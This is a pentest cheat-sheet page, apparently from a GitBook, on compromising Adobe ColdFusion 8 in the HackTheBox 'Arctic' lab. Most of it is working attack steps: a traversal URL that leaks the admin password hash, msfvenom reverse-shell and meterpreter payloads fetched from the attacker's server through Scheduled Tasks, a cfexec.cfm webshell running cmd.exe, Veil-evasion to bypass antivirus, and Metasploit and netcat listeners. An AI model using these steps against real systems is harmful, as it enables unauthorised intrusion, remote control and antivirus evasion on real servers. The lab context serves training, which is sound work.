Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Basics
  • Local File Inclusion - Password Leak!
  • Reverse Shell
  • Webshell
  • Reverse Executable
  • Other:

Was this helpful?

  1. 04 WebApps

Coldfusion

PreviousBlogsNextContent Management (CMS)

Last updated 2 years ago

Was this helpful?

Basics

  • REF: Arctic-HTB

Local File Inclusion - Password Leak!

  • Coldfusion 8 CVE

  • Get the Password hash using LFI

http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Reverse Shell

  • If you get Admin into Coldfusion

  • You can upload a java reverse shell

Create:
msfvenom --list payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp

Share:
python -m SimpleHTTPServer
python3 -m http.server

Upload:
Coldfusion > Debugging > Scheduled Tasks
URL : http://$MyIP:8000/shell.jsp
Publish: Save output to file - Yes!
File: \ColdFusion8\wwwroot\CFIDE\shell.jsp
Submit & Run

Execute:
http://$IP:8500/CFIDE/shell.jsp 

Catch:
nc -nvlp 4444
whoami tolis!

Webshell

  • If you get Admin into Coldfusion

  • You could upload "cfexec.cfm"

  • /usr/share/webshells/cfm/cfexec.cfm ..kali

vim cfexec.cfm
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://$MyIP:8000/cfexec.cfm
Publish: Save output to file - Yes!
\ColdFusion8\wwwroot\CFIDE\cfexec.cfm
Submit & Run

Execute:
http://$IP:8500/CFIDE/cfexec.cfm

Command: C:\windows\system32\cmd.exe
Options: /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c DIR C:\Users > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c systeminfo > C:\ColdFusion8\wwwroot\CFIDE\output.txt

Browse : http://$IP:8500/CFIDE/output.txt
.. arctic\tolis
.. C:\Users\tolis
.. Flag!!
.. Windows Server 2008 R2 64-Bit

Reverse Executable

  • You may be able to upload a reverse executable

----------------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > arctic.exe
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.exe
\ColdFusion8\wwwroot\CFIDE\arctic.exe

msf > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 10.10.13.10
set RHOST 4444
RUN

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE > C:\ColdFusion8\wwwroot\CFIDE\output.txt
http://10.10.10.11:8500/CFIDE/output.txt
.. Found: 'arctic.exe'
.. BLOCKED by Antivirus

----------------------------------
Bypass Antivirus with veil-evasion

>  veil-evasion
>> list
>> choose '24'.. Powershell/meterpreter/rev_tcp
>> LHOST=$MyIP
>> LPORT=4444
>> generate
.. 'arctic'.. which makes 'arctic.bat'
cp arctic.bat .

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.bat
C:\ColdFusion8\wwwroot\CFIDE\arctic.bat

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE\arctic.bat
May need to try this 2-3 Times.. but will work!!

MSF - Connected!

Other:

  • Also consider:

--bad link

Avoid AV detection with

https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html
https://pentest.tonyng.net/attacking-adobe-coldfusion/
https://www.exploit-db.com/exploits/14641/
https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/cfm/cfExec.cfm
Veil
https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/